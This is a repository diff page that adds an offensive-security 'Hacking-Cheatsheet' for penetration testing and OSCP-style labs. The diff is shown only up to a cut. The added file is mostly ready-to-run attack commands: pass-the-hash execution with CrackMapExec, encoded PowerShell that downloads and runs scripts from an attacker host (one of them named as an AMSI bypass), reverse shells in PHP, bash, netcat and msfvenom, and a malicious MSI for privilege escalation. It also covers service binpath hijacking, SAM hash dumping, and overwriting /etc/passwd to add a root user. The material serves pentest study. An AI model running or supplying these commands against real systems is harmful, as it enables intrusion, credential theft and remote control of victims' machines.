STRLCPY/Cipherops

GITBOOK-23: change request with no subject merged in GitBook
Adwaith committed with gitbook-bot 1 year ago

f687b765

1 parent 4d26f2fc

Showing first 10 files as there are too many

■ ■ ■ ■ ■ ■

SUMMARY.md

		skipped 15 lines
16	16		* [Offensive virtual machine's](overview/resourses/offensive-virtual-machines.md)
17	17		* [cybersecurity YouTube channels](overview/resourses/cybersecurity-youtube-channels.md)
18	18		* [All DAMN vulnerable resources](overview/resourses/all-damn-vulnerable-resources.md)
	19	+	* [Hacking Resources](overview/resourses/hacking-resources.md)
19	20		* [👣 OSINT](osint.md)
	21	+	* [Google Dorks](overview/google-dorks.md)
20	22
21	23		***
22	24
		skipped 35 lines
58	60		## ⚒ Tools
59	61
60	62		* [Axion-Scan](tools/axion-scan.md)
	63	+	* [Shodan Pentesting Guide](tools/shodan-pentesting-guide.md)
61	64
62	65		***
63	66
64		-	* [Page 1](page-1/README.md)
65		-	* [Bug Bounty Cheatsheet](page-1/bug-bounty-cheatsheet.md)
66		-	* [Bug-Bounty Checklist](page-1/bug-bounty-checklist.md)
	67	+	* [👻 Cheat-sheet's](cheat-sheets/README.md)
	68	+	* [Bug-Bounty Cheatsheet](cheat-sheets/bug-bounty-cheatsheet.md)
	69	+	* [Linux-Cheatsheet](cheat-sheets/linux-cheatsheet.md)
	70	+	* [Windows-Cheatsheet](cheat-sheets/windows-cheatsheet.md)
	71	+	* [Hacking-Cheatsheet](cheat-sheets/hacking-cheatsheet.md)
67	72

■ ■ ■ ■ ■ ■

cheat-sheets/README.md

1 + # 👻 Cheat-sheet's
2 +
3 +

All occurrences
■ ■ ■ ■ ■ ■

page-1/bug-bounty-checklist.md cheat-sheets/bug-bounty-cheatsheet.md

1 - # Bug-Bounty Checklist
1 + # Bug-Bounty Cheatsheet
2 2
3 3 #### Random DNS Pic <a href="#random-dns-pic" id="random-dns-pic"></a>
4 4
skipped 128 lines

All occurrences

■ ■ ■ ■ ■ ■

cheat-sheets/hacking-cheatsheet.md

1	+	# Hacking-Cheatsheet
2	+
3	+	### Hacking Cheatsheet <a href="#hacking-cheatsheet" id="hacking-cheatsheet"></a>
4	+
5	+	### General enumeration <a href="#general-enumeration" id="general-enumeration"></a>
6	+
7	+	#### Network discovery <a href="#network-discovery" id="network-discovery"></a>
8	+
9	+	Nmap
10	+
11	+	I tend to run 3 nmaps, an initial one, a full one and an UDP one, all of them in parallel:
12	+
13	+	```
14	+	nmap -sV -O --top-ports 50 --open -oA nmap/initial <ip or cidr>
15	+	nmap -sC -sV -O --open -p- -oA nmap/full <ip or cidr>
16	+	nmap -sU -p- -oA nmap/udp <ip or cidr>
17	+
18	+	--top-ports only scan the N most common ports
19	+	--open only show open ports
20	+	-sC use the default scripts
21	+	-sV detect versions
22	+	-O detect Operating Systems
23	+	-p- scan all the ports
24	+	-oA save the output in normal format, grepable and xml
25	+	-sU scan UDP ports
26	+	```
27	+
28	+	Is also possible to specify scripts or ports:
29	+
30	+	```
31	+	nmap --scripts vuln,safe,discovery -p 443,80 <ip or cidr>
32	+	```
33	+
34	+	If there are servers that could be not answering (ping), then add the flag -Pn (example of initial one):
35	+
36	+	```
37	+	nmap -Pn --top-ports 50 --open -oA nmap/initial <ip or cidr>
38	+	```
39	+
40	+	#### Ports discovery (without nmap) <a href="#ports-discovery-without-nmap" id="ports-discovery-without-nmap"></a>
41	+
42	+	nc + bash
43	+
44	+	If you get in a machine that doesn’t have nmap installed, you can do a basic discovery of (for example), top 10 ports open in 192.168.30 by doing:
45	+
46	+	```
47	+	top10=(20 21 22 23 25 80 110 139 443 445 3389); for i in "${top10[@]}"; do nc -w 1 192.168.30.253 $i && echo "Port $i is open" \|\| echo "Port $i is closed or filtered"; done
48	+	```
49	+
50	+	/dev/tcp/ip/port or /dev/udp/ip/port
51	+
52	+	Alternatively, is possible to do the same than above but by using the special dev files `/dev/tcp/ip/port` or `/dev/udp/ip/port` (for example nc is not found):
53	+
54	+	```
55	+	top10=(20 21 22 23 25 80 110 139 443 445 3389); for i in "${top10[@]}"; do (echo > /dev/tcp/192.168.30.253/"$i") > /dev/null 2>&1 && echo "Port $i is open" \|\| echo "Port $i is closed"; done
56	+	```
57	+
58	+	Taking these last examples, is straightforward to create a dummy script for scan a hole /24 net (for example):
59	+
60	+	```
61	+	#!/bin/bash
62	+	subnet="192.168.30"
63	+	top10=(20 21 22 23 25 80 110 139 443 445 3389)
64	+	for host in {1..255}; do
65	+	for port in "${top10[@]}"; do
66	+	(echo > /dev/tcp/"${subnet}.${host}/${port}") > /dev/null 2>&1 && echo "Host ${subnet}.${host} has ${port} open" \|\| echo "Host ${subnet}.${host} has ${port} closed"
67	+	done
68	+	done
69	+	```
70	+
71	+	#### Powershell <a href="#powershell" id="powershell"></a>
72	+
73	+	By using Invoke-PortScan (PowerSploit)
74	+
75	+	```
76	+	$topports="50";$target="192.168.42.43,192.168.42.44,172.16.44.42,172.16.1.1,172.16.255.253";$attacker="192.168.42.42";IEX(New-Object Net.Webclient).downloadString("http://$attacker/4msibyp455.ps1");IEX(New-Object Net.Webclient).downloadString("http://$attacker/Invoke-Portscan.ps1");Invoke-Portscan -Hosts "$target" -TopPorts "$topports"
77	+	```
78	+
79	+	Leverage Native Powershell
80	+
81	+	```
82	+	$target = '192.168.42.42';$scanPorts = @('80', '8080', '443', '8081', '3128', '25', '5985', '5986', '445', '139'); foreach($port in $scanPorts){Test-NetConnection -ComputerName $target -InformationLevel "Quiet" -Port $port}
83	+	```
84	+
85	+	If nmap didn’t grab banners (or is not installed), you can do it with `/dev/tcp/ip/port` `/dev/udp/ip/port` or by using telnet.
86	+
87	+	/dev/tcp/ip/port or /dev/udp/ip/port
88	+
89	+	```
90	+	cat < /dev/tcp/192.168.30.253/22
91	+	SSH-2.0-OpenSSH_6.2p2 Debian-6
92	+	^C pressed here
93	+	```
94	+
95	+	For doing it with udp ports is the same, but changing tcp for udp
96	+
97	+	telnet
98	+
99	+	```
100	+	telnet 192.168.30.253 22
101	+	SSH-2.0-OpenSSH_6.2p2 Debian-6
102	+	^C pressed here
103	+	```
104	+
105	+	#### Web directorie/file scanner <a href="#web-directoriefile-scanner" id="web-directoriefile-scanner"></a>
106	+
107	+	Gobuster
108	+
109	+	Scan all the directories/files by extension:
110	+
111	+	```
112	+	gobuster dir -u http://192.168.24.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,py -o webscan/gobuster-extensions
113	+	```
114	+
115	+	For scanning without extensions, just take out the -x
116	+
117	+	Nikto
118	+
119	+	Sometimes Nikto shows juicy information, I tend to run it like:
120	+
121	+	```
122	+	nikto -Format txt -o webscan/nikto-initial -host http://192.168.24.24 -p 8080
123	+	```
124	+
125	+	fuff
126	+
127	+	Web fuzzer, [you can get fuff here](https://github.com/ffuf/ffuf), it basically bruteforces the dirs.
128	+
129	+	```
130	+	ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://192.168.24.24/FUZZ
131	+	```
132	+
133	+	#### Most usefull dictionaries (OSCP/HTB) <a href="#most-usefull-dictionaries-oscphtb" id="most-usefull-dictionaries-oscphtb"></a>
134	+
135	+	```
136	+	/usr/share/wordlists/rockyou.txt
137	+	/usr/share/wordlists/wfuzz/others/common_pass.txt
138	+
139	+	In seclists-pkg:
140	+
141	+	/usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt
142	+	/usr/share/seclists/Passwords/Leaked-Databases/alleged-gmail-passwords.txt
143	+	/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
144	+	```
145	+
146	+	#### Trusted Folders (Windows) <a href="#trusted-folders-windows" id="trusted-folders-windows"></a>
147	+
148	+	```
149	+	accesschk.exe "ceso" C:\ -wus
150	+	-> -w is to locate writable directories
151	+	-> -u supress errors
152	+	-> -s makes recursion on all subdirectories
153	+
154	+	icacls.exe C:\Windows\Tasks
155	+	^-- Verify if Tasks has execution permissions for example (flag is "RX")
156	+	```
157	+
158	+	#### Samba <a href="#samba" id="samba"></a>
159	+
160	+	smbclient
161	+
162	+	Check if there is anonymous login enabled:
163	+
164	+	```
165	+	smbclient -L 192.168.24.24
166	+	```
167	+
168	+	impacket
169	+
170	+	Is also possible to use impacket in the same way than smbclient to check for anonymous login (and a lot more as browse the shares) in case of incompatible versions.
171	+
172	+	```
173	+
174	+	/usr/share/doc/python3-impacket/examples/smbclient.py ""@192.168.24.24
175	+	```
176	+
177	+	smbmap
178	+
179	+	Check which permissions we have in those shares (if there are):
180	+
181	+	```
182	+	smbmap -H 192.168.24.24
183	+	Or having an user:
184	+	smbmap -u ceso -H 192.168.24.24
185	+	```
186	+
187	+	#### Login through CIFS/WinRM/PSSession <a href="#login-through-cifswinrmpssession" id="login-through-cifswinrmpssession"></a>
188	+
189	+	When injecting a ticket and impersonating a user, we can swap `CIFS` for `HTTP` for getting a shell via WinRM or swap `CIFS` for `HOST` for getting a shell via PsExec!!!
190	+
191	+	CrackMapExec - WinRM
192	+
193	+	With Hash
194	+
195	+	```
196	+	crackmapexec winrm 172.16.80.24 -u administrator -H 09238831b1af5edab93c773f56409d96 -x "ipconfig"
197	+	```
198	+
199	+	With Password (Example gets a reverse shell)
200	+
201	+	```
202	+	crackmapexec winrm 172.16.80.24 -u brie -p fn89hudi1892r -x "powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgAxADAANwAvAG4AaQBlAHIAaQAuAHAAcwAxACIAKQA7AEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANAA5AC4AMQAwADcALwByAHUAbgAtAHMAaABlAGwAbABjAG8AZABlAC0ANgA0AGIAaQB0AHMALgBwAHMAMQAiACkACgA="
203	+	```
204	+
205	+	CrackMapExec - SMB
206	+
207	+	With Hash
208	+
209	+	```
210	+	crackmapexec smb 172.16.21.22 -u gouda -H 09238831b1af5edab93c773f56409d96 -x "powershell.exe IEX(New-Object Net.Webclient).downloadString('http://192.168.42.42/4msibyp455.ps1');IEX(New-Object Net.Webclient).downloadString('http://192.168.42.42/dameelreversooo.ps1')"
211	+	```
212	+
213	+	With Hash + Domain
214	+
215	+	```
216	+	crackmapexec smb 172.16.21.22 -d example.com -u cuartirolo -H 09238831b1af5edab93c773f56409d96 -x "whoami"
217	+	```
218	+
219	+	With password
220	+
221	+	```
222	+	smb 172.16.21.22 -u administrator -p fn89hudi1892r -x "powershell.exe IEX(New-Object Net.Webclient).downloadString('http://192.168.42.42/dameelreversooo.ps1')"
223	+	```
224	+
225	+	Version (nmap didn’t detect it)
226	+
227	+	Sometimes nmap doesn’t show the version of Samba in the remote host, if this happens, a good way to know which version the remote host is running, is to capture traffic with wireshark against the remote host on 445/139 and in parallel run an smbclient -L, do a follow tcp stream and with this we might see which version the server is running.
228	+
229	+	![](https://ceso.github.io/images/cheatsheet/smb-version-wireshark.png)
230	+
231	+	### Exfiltration <a href="#exfiltration" id="exfiltration"></a>
232	+
233	+	#### Samba <a href="#samba-1" id="samba-1"></a>
234	+
235	+	Generate a samba server with Impacket:
236	+
237	+	```
238	+	impacket-smbserver tools /home/kali/tools
239	+	```
240	+
241	+	Mount in Windows
242	+
243	+	Mounting it in Windows with Powershell:
244	+
245	+	```
246	+	New-PSDrive -Name "tools" -PSProvider "Filesystem" -Root "\\192.168.42.42\tools"
247	+	```
248	+
249	+	Mounting it without Powershell:
250	+
251	+	```
252	+	net use z: \\192.168.42.42\tools"
253	+	```
254	+
255	+	On windows, to list mounted shares, either Powershell or without it:
256	+
257	+	```
258	+	Powershell: Get-SMBShare
259	+	Without Powershell: net share
260	+	```
261	+
262	+	Mount in Linux
263	+
264	+	Is needed to have installed cifs-utils, to install it (in debian based):
265	+
266	+	```
267	+	sudo apt-get install cifs-utils
268	+	```
269	+
270	+	To mount it:
271	+
272	+	```
273	+	sudo mount -t cifs //192.168.42.42/tools ~/my_share/
274	+	```
275	+
276	+	To list mounted shares:
277	+
278	+	```
279	+	mount \| grep cifs
280	+	grep cifs /proc/mount
281	+	```
282	+
283	+	#### HTTP <a href="#http" id="http"></a>
284	+
285	+	From your local attacker machine, create a http server with:
286	+
287	+	```
288	+	sudo python3 -m http.server 80
289	+	sudo python2 -m SimpleHTTPServer 80
290	+	```
291	+
292	+	It’s also possible to specify which path to share, for example:
293	+
294	+	```
295	+	sudo python3 -m http.server 80 --dir /home/kali/tools
296	+	```
297	+
298	+	Windows
299	+
300	+	```
301	+	iex(new-object net.webclient).downloadstring("http://192.168.42.42/evil.ps1)
302	+	IWR -Uri "http://192.168.42.42/n64.exe" -Outfile "n64.exe"
303	+	certutil.exe -urlcache -split -f "http://192.168.42.42/nc.exe" nc.exe
304	+	wmic process get brief /format:"http://192.168.42.42/evilexcel.xsl
305	+	bitsadmin /Transfer myDownload http://192.168.42.42/evilfile.txt C:\Windows\Temp\evilfile.txt
306	+	```
307	+
308	+	Linux
309	+
310	+	```
311	+	curl http://192.168.42.42/evil.php --output evil.php
312	+	```
313	+
314	+	#### FTP <a href="#ftp" id="ftp"></a>
315	+
316	+	If there is an ftp server which we have access, we can upload files there through it, the "" is the same for both, windows or linux:
317	+
318	+	```
319	+	Connect and login with:
320	+
321	+	ftp 192.168.42.42
322	+
323	+	Upload the files with:
324	+
325	+	put evil.py
326	+
327	+	Sometimes is needed to enter in passive mode before doing anything, if is the case, just type:
328	+
329	+	pass
330	+
331	+	followed by enter
332	+	```
333	+
334	+	#### Sockets <a href="#sockets" id="sockets"></a>
335	+
336	+	Using nc/ncat is possible to create as a listener to upload/download stuff through them, the syntax for nc and ncat is basically the same. Create the socket with:
337	+
338	+	```
339	+	Attacker:
340	+	nc -lvnp 443 < evil.php
341	+
342	+	For both cases from windows, the only difference is to write nc.exe
343	+
344	+	Victim:
345	+	nc -v 192.168.42.42 443 > evil.php
346	+	```
347	+
348	+	#### RDP <a href="#rdp" id="rdp"></a>
349	+
350	+	If we have access to a windows machine with a valid user/credentials and this user is in the “Remote Desktop Users”, we can share a local directorie as a mount volume through rdp itself once we connect to the machine:
351	+
352	+	Linux
353	+
354	+	Mounting volume
355	+
356	+	```
357	+	rdesktop -g 1600x800 -r disk:tmp=/usr/share/windows-binaries 192.168.30.30 -u pelota -p -
358	+	```
359	+
360	+	Forcing enable of clipboard
361	+
362	+	I might want to force the use of the clipboard if it’s not being taken by default and use the 100% of the screen:
363	+
364	+	```
365	+	rdesktop 192.168.42.42 -d arkham -u ceso -p pirata -g 100% -x 0x80 -5 -K -r clipboard:CLIPBOARD
366	+	```
367	+
368	+	Connection with restricted admin mode
369	+
370	+	```
371	+	xfreerdp en Linux soporta restricted admin mode, se ejecuta asi por ej: `xfreerdp /u:admin /pth:<NTLM-hash-of-user-admin-pass> /v:192.168.42.42 /cert-ignore
372	+	```
373	+
374	+	Windows
375	+
376	+	Restricted admin mode
377	+
378	+	```
379	+	Enable it :
380	+	Through registry:
381	+	HKLM:\System\CurrentControlSet\Control\Lsa
382	+	Use "DisableRestrictedAdmin" property
383	+	With Powershell:
384	+	New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
385	+
386	+	Connect it:
387	+	--> mstsc.exe /restrictedadmin
388	+	```
389	+
390	+	Stacked commands without GUI
391	+
392	+	```
393	+	sharprdp.exe computername=appsrv01 command="powershell (New-Object System.Net.WebClient).DownloadFil
394	+	e('http://192.168.42.42/met.exe', 'C:\Windows\Tasks\met.exe'); C:\Windows\Tasks\met.exe" username=example\ceso password=soyUnaPassword
395	+	```
396	+
397	+	### Pivoting <a href="#pivoting" id="pivoting"></a>
398	+
399	+	It’s possible to do pivoting by using proxychains, pure nc’s or in case of linux just some fifo files (I will write them down this another methods down maybe in a future), I have used during all the OSCP an awesome tool called (sshuttle)\[https://github.com/sshuttle/sshuttle] (it’s a transparent proxy server that works like “a vpn”, and doesn’t require with super rights, only thing needed is that the bastion server you will use, needs to have installed python) and sometimes some SSH Forwarding. Something worth to mention nmap doesn’t work through sshuttle.
400	+
401	+	#### sshuttle <a href="#sshuttle" id="sshuttle"></a>
402	+
403	+	One hop
404	+
405	+	Let’s say we are in an intranet and we have compromised a firewall that gives us access to the management net (fw.example.mgmt - ips 192.168.20.35 and 192.168.30.253 as the management ip), by using sshuttle we can create a “vpn” to talk directly to those servers, for that, we use:
406	+
407	+	```
408	+	sshuttle [email protected] 192.168.30.0/24
409	+	```
410	+
411	+	Multi-hops
412	+
413	+	Now imagine that after we broke up into the management net after some some enumeration, we ended to compromise a machine that has also access to a production environment (foreman.example.mgmt - ips 192.168.30.40 and 192.168.25.87), we can take advantage of sshuttle + ProxyCommand of ssh to create a “vpn” through this multiple hops, so…putting it down, this will be kind of as follow (the diagram is extremly simplified and just for the sake of illustrate this visually, so it doesn’t intend to provide a 100% precise network diagram):
414	+
415	+	![](https://ceso.github.io/images/cheatsheet/multiple-hop-sshuttle.png)
416	+
417	+	To have that working, is needed to put the next conf in your ssh conf file (normally \~/.ssh/config. It’s based on the example above, but is easy to extrapolate to different scenarios):
418	+
419	+	```
420	+	Host fw.example.mgmt
421	+	Hostname 192.168.20.35
422	+	User userOnFw
423	+	IdentityFile ~/.ssh/priv_key_fw
424	+	Host foreman.example.mgmt
425	+	Hostname 192.168.30.40
426	+	User root
427	+	ProxyJump fw.example.mgmt
428	+	IdentityFile ~/.ssh/priv_key_internal
429	+	```
430	+
431	+	And now to setup the “multiple hop vpn”, run:
432	+
433	+	```
434	+	sshuttle -r foreman.example.mgmt -v 192.168.25.0/24 &
435	+
436	+	Later on is possible to connect from the local machine:
437	+	ssh [email protected]
438	+	```
439	+
440	+	#### Chisel with remote port forward from machine in the net <a href="#chisel-with-remote-port-forward-from-machine-in-the-net" id="chisel-with-remote-port-forward-from-machine-in-the-net"></a>
441	+
442	+	On attacker machine I start up a chisel reverse server on port 9050 (imagine this machine IP is 192.168.90.90)
443	+
444	+	On compromised machine in the network I start a client connection against the server running in the attacker. The command below will be forwarding the traffic from port 8081 in the machine 172.16.42.90 throughout the compromised machine (via localhost in port 5050) to the attacker.
445	+
446	+	```
447	+	./chisel client 192.168.90.90:9050 R:127.0.0.1:5050:172.16.42.90:8081
448	+	```
449	+
450	+	#### Metasploit: autoroute + socks\_proxy <a href="#metasploit-autoroute--socks_proxy" id="metasploit-autoroute--socks_proxy"></a>
451	+
452	+	```
453	+	use post/multi/manage/autoroute
454	+	set session 8
455	+	run
456	+	use auxiliary/server/socks_proxy
457	+	run -j
458	+	```
459	+
460	+	The SRVPORT of socks\_proxy must match the one configured in proxychains.conf as the VERSION used as well.
461	+
462	+	### Reverse shells <a href="#reverse-shells" id="reverse-shells"></a>
463	+
464	+	#### php <a href="#php" id="php"></a>
465	+
466	+	```
467	+	<?php $sock = fsockopen("192.168.42.42","443"); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>
468	+	```
469	+
470	+	```
471	+	php -r '$sock=fsockopen("192.168.42.42",443);exec("/bin/sh -i <&3 >&3 2>&3");'
472	+	```
473	+
474	+	#### bash <a href="#bash" id="bash"></a>
475	+
476	+	```
477	+	bash -i >& /dev/tcp/192.168.42.42/443 0>&1
478	+	```
479	+
480	+	#### sh + nc <a href="#sh--nc" id="sh--nc"></a>
481	+
482	+	```
483	+	rm /tmp/f;mkfifo /tmp/f;cat /tmp/f \| /bin/sh -i 2>&1 \| nc 192.168.42.42 443 >/tmp/f
484	+	```
485	+
486	+	#### Perl (example deploy as cgi-bin) <a href="#perl-example-deploy-as-cgi-bin" id="perl-example-deploy-as-cgi-bin"></a>
487	+
488	+	```
489	+	msfvenom -p cmd/unix/reverse_perl LHOST="192.168.42.42" LPORT=443 -f raw -o reverse_shell.cgi
490	+	```
491	+
492	+	#### Java (example to deploy on tomcat) <a href="#java-example-to-deploy-on-tomcat" id="java-example-to-deploy-on-tomcat"></a>
493	+
494	+	```
495	+	msfvenom -p java/shell_reverse_tcp LHOST=192.168.42.42 LPORT=443 -f war rev_shell.war
496	+	```
497	+
498	+	#### Windows HTTP download reverse shell <a href="#windows-http-download-reverse-shell" id="windows-http-download-reverse-shell"></a>
499	+
500	+	```
501	+	msfvenom -a x86 --platform windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://192.168.42.42/Invoke-PowerShellTcp.ps1')\"" -e x86/unicode_mixed BufferRegister=EAX -f python
502	+	```
503	+
504	+	```
505	+	msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.42.42 lport=443 -f csharp
506	+	```
507	+
508	+	We can also use it with the following parameters for migration
509	+
510	+	```
511	+	msfvenom -a x64 -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.59 LPORT=443 EnableStageEncoding=True PrependMigrate=True -f csharp
512	+	```
513	+
514	+	Or either, in the `msfconsole` add the parameter `AutoRunScript`, the following will try to migrate our reverse too explorer.exe:
515	+
516	+	```
517	+	set AutoRunScript post/windows/manage/migrate name=explorer.exe spawn=false
518	+	```
519	+
520	+	#### Windows staged reverse TCP <a href="#windows-staged-reverse-tcp" id="windows-staged-reverse-tcp"></a>
521	+
522	+	```
523	+	msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.42.42 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o reverse.exe
524	+	```
525	+
526	+	#### Windows stageless reverse TCP <a href="#windows-stageless-reverse-tcp" id="windows-stageless-reverse-tcp"></a>
527	+
528	+	```
529	+	msfvenom -p windows/shell_reverse_tcp EXITFUNC=thread LHOST=192.168.42.42 LPORT=443 -f exe -o <output_name.format>
530	+	```
531	+
532	+	#### Linux staged reverse TCP <a href="#linux-staged-reverse-tcp" id="linux-staged-reverse-tcp"></a>
533	+
534	+	```
535	+	msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.42.42 LPORT=443 -f elf -o <outout_name>.elf
536	+	```
537	+
538	+	#### Linux staged reverse TCP <a href="#linux-staged-reverse-tcp-1" id="linux-staged-reverse-tcp-1"></a>
539	+
540	+	```
541	+	msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.42.42 LPORT=443 -f elf -o <outout_name>.elf
542	+	```
543	+
544	+	### Privilege escalation <a href="#privilege-escalation" id="privilege-escalation"></a>
545	+
546	+	#### Windows <a href="#windows-2" id="windows-2"></a>
547	+
548	+	Always Install Elevated
549	+
550	+	If we have enabled a privilege which allow us to ALWAYS install with elevated privileges, we can craft a .msi leveranging wixtools, specifically with candl.exe and light.exe. The steps are as follows:
551	+
552	+	1 - Create a malicious .xml wix file:
553	+
554	+	```
555	+	<?xml version="1.0"?>
556	+	<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
557	+	<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
558	+	<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
559	+	<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
560	+	<Directory Id="TARGETDIR" Name="SourceDir">
561	+	<Directory Id="ProgramFilesFolder">
562	+	<Directory Id="INSTALLLOCATION" Name="Example">
563	+	<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
564	+	</Component>
565	+	</Directory>
566	+	</Directory>
567	+	</Directory>
568	+	<Feature Id="DefaultFeature" Level="1">
569	+	<ComponentRef Id="ApplicationFiles"/>
570	+	</Feature>
571	+	<CustomAction Id="SystemShell" Directory="TARGETDIR" ExeCommand="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA0ADkALgA5ADIALwBuAGkAZQByAGkALgBwAHMAMQAnACkAOwBJAEUAWAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAOQAuADkAMgAvAHIAdQBuAC0AcwBoAGUAbABsAGMAbwBkAGUALQA2ADQAYgBpAHQALgBwAHMAMQAtAGYAcgBvAG0AOQAyAC0AOAAwADgAMQBwAG8AcgB0ACcAKQAKAA==" Execute="deferred" Impersonate="no" Return="ignore"/>
572	+	<InstallExecuteSequence>
573	+	<Custom Action="SystemShell" After="InstallInitialize"></Custom>
574	+	</InstallExecuteSequence>
575	+	</Product>
576	+	</Wix>
577	+	```
578	+
579	+	The powershell in b64 executed is this one:
580	+
581	+	```
582	+	IEX(New-Object Net.Webclient).downloadString('http://attacker/nieri.ps1');IEX(New-Object Net.Webclient).downloadString('http://attacker/run-shellcode-64bit.ps1')
583	+	```
584	+
585	+	2 - Create a malicious .wix (this step and next one MUST be run from the path where the wix tools are located)
586	+
587	+	```
588	+	candle.exe ..\bad-wix-pe.xml -out ..\reverse.wix
589	+	```
590	+
591	+	3 - Create the malicious .msi from the .wix
592	+
593	+	```
594	+	light.exe ..\reverse.wix -out ..\vamosvamos.msi
595	+	```
596	+
597	+	Run-As
598	+
599	+	```
600	+	PS C:\> $secstr = New-Object -TypeName System.Security.SecureString
601	+	PS C:\> $username = "<domain>\<user>"
602	+	PS C:\> $password = '<password>'
603	+	PS C:\> $secstr = New-Object -TypeName System.Security.SecureString
604	+	PS C:\> $password.ToCharArray() \| ForEach-Object {$secstr.AppendChar($_)}
605	+	PS C:\> $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr
606	+	PS C:\> Invoke-Command -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://<ip/host>:<port>/path/to/file.evil') } -Credential $cred -Computer localhost
607	+	-----------------------------------------------------------------------------------------------------
608	+	Invoke-Command -ComputerName localhost -Creadential $credential -ScriptBlock { C:\inetpub\wwwroot\internal-01\log\nc.exe 10.10.14.4 1338 -e cmd.exe }
609	+	```
610	+
611	+	Incorrect permisions in services (sc config binpath)
612	+
613	+	Binpath is set as running `cmd.exe` passing a commad to execute to it (so once the process dies, the one executed by it so the command to `cmd.exe` remains):
614	+
615	+	```
616	+	sc config upnphost binpath= "C:\WINDOWS\System32\cmd.exe /k C:\inetpub\wwwroot\nc.exe -nv 192.168.42.42 443 -e C:\WINDOWS\System32\cmd.exe"
617	+	```
618	+
619	+	SAM + SYSTEM + Security
620	+
621	+	If those 3 files are in your hands (you could download to your attacker machine), you can dump hashes and crack them:
622	+
623	+	```
624	+	/usr/share/doc/python3-impacket/examples/secretsdump.py -sam SAM.bak -security SECURITY.bak -system SYSTEM.bak LOCAL
625	+
626	+	sudo john dumped_hashes --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
627	+	```
628	+
629	+	#### Linux <a href="#linux-2" id="linux-2"></a>
630	+
631	+	/home/user/openssl =ep (empty capabilities)
632	+
633	+	Make 2 copies of passwd, one as backup of the original, and one that will be used as custom:
634	+
635	+	```
636	+	cp /etc/passwd /tmp/passwd.orig
637	+	cp /etc/passwd /tmp/passwd.custom
638	+	```
639	+
640	+	Now, a custom user will be created and added to `/tmp/passwd.custom` with `customPassword` and as root user (UID = GID = 0):
641	+
642	+	```
643	+	echo 'ceso:'"$( openssl passwd -6 -salt xyz customPassword )"':0:0::/tmp:/bin/bash' >> /tmp/passwd.custom
644	+	```
645	+
646	+	Now, create a custom `key.pem` and `cert.pem` with openssl:
647	+
648	+	```
649	+	openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
650	+	```
651	+
652	+	Encrypt the new custom passwd:
653	+
654	+	```
655	+	openssl smime -encrypt -aes256 -in /tmp/passwd.custom -binary -outform DER -out /tmp/passwd.enc /tmp/cert.pem
656	+	```
657	+
658	+	Now, decrypt the custom passwd overwritting in the process the real one (`/etc/passwd`):
659	+
660	+	```
661	+	cd /
662	+	/home/ldapuser1/openssl smime -decrypt -in /tmp/passwd.enc -inform DER -inkey /tmp/key.pem -out /etc/passwd
663	+	```
664	+
665	+	And finally, just login with the user created with root privileges by using `customPassword`:
666	+
667	+	Command web injection: add user
668	+
669	+	```
670	+	/usr/sbin/useradd c350 -u 4242 -g root -m -d /home/c350 -s /bin/bash -p $(echo pelota123 \| /usr/bin/openssl passwd -1 -stdin) ; sed 's/:4242:0:/:0:0:/' /etc/passwd -i
671	+	```
672	+
673	+	NFS; no\_root\_squash,insecure,rw
674	+
675	+	If `/etc/exports` has a line like:
676	+
677	+	```
678	+	/srv/pelota 192.168.42.0/24(insecure,rw)
679	+	/srv/pelota 127.0.0.1/32(no_root_squash,insecure,rw)
680	+	```
681	+
682	+	NFS is being exported and you and you have ssh access to the machine. From your attacker machine while logged as root user run:
683	+
684	+	```
685	+	ssh -f -N [email protected] -L 2049:127.0.0.1:2049
686	+	mount -t nfs 127.0.0.1:/srv/pelota my_share
687	+	cd my_share
688	+	cat > shell.c<<EOF
689	+	#include <unistd.h>
690	+	int main(){
691	+	setuid(0);
692	+	setgid(0);
693	+	system("/bin/bash");
694	+	}
695	+	EOF
